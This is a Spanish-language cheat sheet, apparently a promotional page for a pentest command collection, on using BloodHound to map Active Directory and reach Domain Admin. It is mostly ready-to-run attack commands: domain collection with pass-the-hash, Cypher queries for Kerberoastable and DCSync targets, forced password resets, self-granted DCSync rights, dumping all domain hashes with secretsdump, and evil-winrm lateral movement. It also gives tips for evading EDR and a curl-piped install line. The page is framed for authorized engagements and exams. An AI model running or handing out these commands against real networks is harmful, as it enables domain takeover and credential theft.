Cheatsheet BloodHound 2026

Recolección, ingesta, consultas Cypher y rutas de ataque de Active Directory — todo lo necesario para mapear un dominio y encontrar la ruta más corta a Domain Admin con BloodHound.

Actualizado:

Navegación rápida

01 Recolección (SharpHound) 02 Setup e Ingesta 03 Consultas Cypher 04 Edges y Abuso 05 Rutas de ataque 06 Consejos Pro

# Recolección (SharpHound / bloodhound-python)

Primero, recolecta los datos del dominio. Usa SharpHound desde Windows o bloodhound-python desde Linux con credenciales válidas.

SharpHound (Windows)

.\SharpHound.exe -c All --zipfilename corp
Recolecta todo desde un host Windows unido al dominio o autenticado
.\SharpHound.exe -c DCOnly --Jitter 30 --Throttle 1000
Recolección más sigilosa — solo DC, sin sesiones, regulada

bloodhound-python (Linux / Kali)

bloodhound-python -d domain.local -u USER -p PASS -c All -ns DC_IP --zip
Recolección remota desde Kali con credenciales válidas
bloodhound-python -d domain.local -u USER --hashes :NTLM_HASH -c All -ns DC_IP --zip
Recolección con un hash NTLM capturado (pass-the-hash)
nxc ldap DC_IP -u USER -p PASS --bloodhound -c All --dns-server DC_IP
Recolección directa con NetExec (nxc) — sin recolector separado

# Setup e Ingesta

BloodHound CE corre en Docker con una UI web. Importa el ZIP recolectado y luego marca tus cuentas comprometidas como Owned.

curl -L https://ghst.ly/getbhce | docker compose -f - up
Lanza BloodHound CE con el archivo Docker Compose oficial
💡 Consejo: tras el primer inicio de sesión (admin por defecto), importa el ZIP vía Administración → File Ingest. BloodHound antiguo: arrastra el ZIP al grafo o usa Upload Data.
# Clic derecho en tu usuario/equipo comprometido → Mark as Owned
Los nodos Owned alimentan las consultas «Shortest Paths from Owned»

# Consultas Cypher

Cypher es el lenguaje de consulta del grafo detrás de BloodHound. Estas consultas destacan al instante los objetivos de mayor valor.

MATCH (u:User {hasspn:true}) RETURN u
Usuarios Kerberoastables (cuentas con un SPN)
MATCH (u:User {dontreqpreauth:true}) RETURN u
Usuarios AS-REP roastables (sin pre-autenticación Kerberos)
MATCH p=shortestPath((u:User {owned:true})-[*1..]->(g:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p
Ruta más corta de tu usuario owned hacia los Domain Admins
MATCH (u:User)-[:MemberOf*1..]->(g:Group)-[:DCSync|GetChanges|GetChangesAll]->(:Domain) RETURN u
Principals que pueden hacer DCSync (volcar todos los hashes)
MATCH p=(u {owned:true})-[:GenericAll|WriteDacl|WriteOwner|ForceChangePassword*1..]->(t) RETURN p
Rutas de abuso de ACL desde tu principal owned hacia cualquier objetivo

# Edges y cómo abusar de ellos

Cada edge es un derecho abusable. Estos son los que más explotarás en engagements y exámenes.

ForceChangePassword → net rpc password "TARGET" "NewPass1!" -U "DOMAIN"/"USER"%"PASS" -S DC
Restablece la contraseña de un objetivo con ForceChangePassword
GenericAll (sobre user) → targetedKerberoast.py -d domain.local -u USER -p PASS
Añade un SPN y Kerberoast a un usuario sobre el que tienes GenericAll
AddMember → net rpc group addmem "TARGET GROUP" "YOURUSER" -U ... -S DC
Añádete a un grupo privilegiado sobre el que puedes escribir
WriteDacl → dacledit.py -action write -rights DCSync -principal USER -target-dn "DC=domain,DC=local"
Concédete derechos DCSync editando la DACL del dominio

# Rutas de ataque hacia Domain Admin

Convierte el grafo en acción. Usa las consultas de análisis prediseñadas y luego ejecuta cada edge de la ruta.

💡 Consejo: consultas prediseñadas en la pestaña Analysis: «Shortest Paths to Domain Admins», «Shortest Paths from Owned Principals», «Find Principals with DCSync Rights», «Kerberoastable Users».
impacket-GetUserSPNs domain.local/USER:PASS -dc-ip DC_IP -request
Ejecuta el paso de Kerberoasting identificado por BloodHound
impacket-secretsdump domain.local/USER:PASS@DC_IP
Una vez alcanzada una ruta DCSync, vuelca todos los hashes del dominio
evil-winrm -i TARGET -u USER -H NTLM_HASH
Muévete lateralmente por la ruta con pass-the-hash

# Consejos Pro

Saca más partido a BloodHound en engagements reales y en exámenes de AD.

🎯 Marca todo como Owned: a medida que comprometes cuentas, márcalas Owned para que «Shortest Paths from Owned» se mantenga exacto y revele nuevas rutas.
🧭 Ordena por alto valor: céntrate en objetivos de alto valor (DA, DC, Enterprise Admins). BloodHound los marca automáticamente.
🥷 Sé sigiloso: en redes monitorizadas usa -c DCOnly y omite la recolección de sesiones para no alertar al EDR.
🔁 Recolecta tras cada avance: nuevas sesiones y credenciales abren nuevos edges — recolecta tras compromisos clave.
📚 Lee la pestaña Help: clic derecho en un edge → Help explica exactamente cómo abusar de él, con comandos.

❓ Preguntas frecuentes BloodHound

BloodHound mapea las relaciones de Active Directory como un grafo y revela las rutas de ataque hacia Domain Admin. Recolecta usuarios, grupos, sesiones, ACL y trusts con un recolector (SharpHound o bloodhound-python), y luego permite ejecutar consultas Cypher y análisis de ruta más corta para encontrar cadenas de escalada invisibles a la revisión manual.

SharpHound es el recolector C#/.NET ejecutado desde un host Windows. bloodhound-python corre de forma remota desde Linux/Kali con credenciales válidas — ideal sin ejecución en una máquina Windows. Ambos generan JSON que importas en BloodHound.

Los edges son relaciones dirigidas que representan derechos abusables — por ejemplo MemberOf, AdminTo, HasSession, GenericAll, WriteDacl, ForceChangePassword y DCSync. Cada edge es un paso de una ruta de ataque; el panel Help explica cómo abusar de cada uno.

Usa la consulta prediseñada «Shortest Paths to Domain Admins», o marca tu principal Owned y ejecuta «Shortest Paths from Owned Principals». O escribe Cypher: MATCH p=shortestPath((u:User {owned:true})-[*1..]->(g:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p.

BloodHound CE es la reescritura actual de SpecterOps en Docker con una UI web y backend PostgreSQL/Neo4j, reemplazando la antigua app Electron. Los recolectores y conceptos Cypher son los mismos; CE mejora la escalabilidad, la API y la experiencia de consultas.

Puede serlo. SharpHound con -c All es ruidoso — LDAP masivo, enumeración de sesiones y SMB activan el EDR. Para sigilo, recolecta solo lo necesario (-c DCOnly), regula con --Jitter/--Throttle, y evita la recolección de sesiones en redes monitorizadas.

Ruta más corta a los Domain Admins, usuarios Kerberoastables (hasspn:true), AS-REP roastables (dontreqpreauth:true), principals con derechos DCSync, principals con GenericAll/WriteDacl sobre objetivos de alto valor, y equipos donde un usuario comprometido tiene una sesión activa.

En los tres exámenes muy orientados a AD, BloodHound se usa justo tras el punto de entrada para mapear el dominio y planificar la ruta hacia Domain Admin. Destaca los objetivos de Kerberoasting, las cadenas de abuso de ACL y el movimiento lateral, convirtiendo un dominio grande en un plan de ataque claro y priorizado.

SharpHound produce un ZIP de archivos JSON. En BloodHound CE, usa Administración → File Ingest; en el BloodHound antiguo, arrastra el ZIP a la UI o usa Upload Data. Tras la ingesta, ejecuta consultas prediseñadas o marca tus principals comprometidos como Owned.

Sí. El mapa mental gratuito organiza 12.020+ comandos, incluyendo la recolección de BloodHound, las consultas Cypher y toda la cadena de ataque de AD (Kerberoasting, abuso de ACL, DCSync) con búsqueda instantánea, para encontrar rápido el comando y la consulta exactos en un engagement o en la preparación de un examen.

📚 Recursos relacionados

Domina Active Directory con 12.020+ comandos

Esta cheatsheet es solo la superficie. Pentest Mindmap organiza 12.020+ comandos en 34 categorías — incluida toda la cadena de ataque de BloodHound y Active Directory — con búsqueda instantánea.

Empezar gratis →
📎 ¿Te ha resultado útil esta cheatsheet?